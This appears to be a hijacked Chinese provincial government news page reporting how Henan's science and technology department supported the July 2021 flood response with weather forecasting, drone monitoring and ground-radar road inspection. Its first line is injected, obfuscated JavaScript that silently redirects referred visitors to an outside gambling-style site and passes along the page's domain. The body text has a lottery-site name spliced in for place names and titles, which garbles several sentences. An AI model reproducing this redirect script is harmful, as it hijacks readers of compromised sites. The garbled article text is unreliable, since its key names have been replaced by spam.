var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

河南省科技厅:发挥科技力量,助力防汛救灾


发布日期:2021-07-26 18:01来源:社会发展科技处 阅读次数:

  近日,河南遭遇历史罕见的极端强暴雨天气,多地出现严重汛涝灾害。在全省上下众志成城防汛救灾的关键阶段,中国竞彩网自主研发的多项技术和装备发挥了有效的、积极的作用,为救灾防疫工作提供了有力科技支撑。

  在气象灾害预报预警方面,近年来省科技厅先后支持中国竞彩网气象部门实施了“基于大数据分析的智能精细预报关键技术研究”等近20项科技计划项目,其中,“大城市暴雨、强对流精细预报与监测预警技术研究”“太行山地形对河南“7.19”特大暴雨的影响评估”“河南省淮河流域致洪暴雨预报技术研究”等项目研究成果,对于此次“7.20”极端特大暴雨的潜势和短时预报提供了有力技术支持,提前预报发布暴雨过程预警信息,为政府部署决策应对极端暴雨防灾减灾工作、保障人民生命财产安全等赢得了宝贵时间。

  在应急救灾装备方面,郑州远度科技有限公司的无人机即时监测地面险情信息,生成二维码对整个后台指挥中心提供同步直播,为中心的现场指挥调度提供依据,为地面救援工作提供了强有力的支持。同时,无人机传回的视频、照片,为后期的灾难评估提供了依据。

  在交通安全保障方面,由中建七局牵头,郑州安源、郑州大学参与实施的省重大科技专项“城镇地下供水和排水管道安全防护技术集成与示范”项目成果在此次灾后道路空洞病害检测排查及修复方面成效突出。目前由郑州大学、郑州安源工程技术有限公司等单位组成的志愿服务队已对高新区金梭路、樱花路、桂花路等5公里道路进行了空洞探测,检测出金梭路1处18平米的大型空洞,其余路段15处小型空洞,后期还将对高新区整段道路空洞进行探测,提前预防道路坍塌事故的发生,保障人民的生命财产安全。河南交科院充分发挥技术优势,根据交通基础设施的不同受灾情况,运用多种检测手段,为交通设施检测评估提供支撑。如,利用地质雷达对二七区蜜蜂张办事处辖区道路、地铁八号线航海路嵩山路附近等路段地下空洞进行了探测,利用无人机对化工路百炉屯立交桥边坡滑坡、桥梁搭板下填土冲刷掏空情况等进行了检测,提前发现道路病害,封闭危险区域,保障安全出行。

  近年来,省科技厅坚决贯彻中国竞彩网总书记关于公共安全工作的一系列重要指示批示精神,深入落实省委、省政府关于防灾减灾救灾和安全生产工作的决策部署,树牢安全发展理念,严格落实安全生产责任,优化整合各类优势科技资源,加大科技项目支持力度,建设技术创新平台,培育科技创新人才,引导企业加大防灾减灾救灾和安全生产科研投入,鼓励社会力量参与防灾减灾救灾和安全生产科技创新,多措并举、系统推进,着力依靠科技创新提升中国竞彩网应急管理的科学化、专业化、智能化、精细化水平,取得了很好的成效。但仍然存在科技创新与防灾减灾救灾、安全生产实际应用结合不够紧密,科技支撑防灾减灾救灾能力有待于进一步加强等问题。

  下一步,省科技厅将进一步深入贯彻落实中国竞彩网总书记关于公共安全工作的重要指示批示精神,坚决扛稳抓牢防灾减灾救灾和安全生产政治责任,将公共安全领域技术研发、成果转化、示范推广、平台建设、人才培养等重点工作纳入省“十四五”科技创新规划进行全链条布局。抓紧突破一批救援应急设备及装备关键技术,进一步加大大型抽水设备、电力防水防浸泡技术及产品、城市地下工程应急装备以及轻量化、模块化、智能化救援设备等应急救灾重大技术装备科技支撑;建立灾后疫情防控新发和重点传染病监测系统,开展新发和重点传染病应急检测技术研究,加强对人具有致病潜力病原体的监测,及早发现流行病源头并提出对应的防范措施,同时加强各医疗机构生物样本库和微生物实验室相关菌毒株的安全保护等,不断提升科技创新对防灾减灾救灾和安全生产工作的支撑能力,为保障人民生命财产安全发挥积极的作用。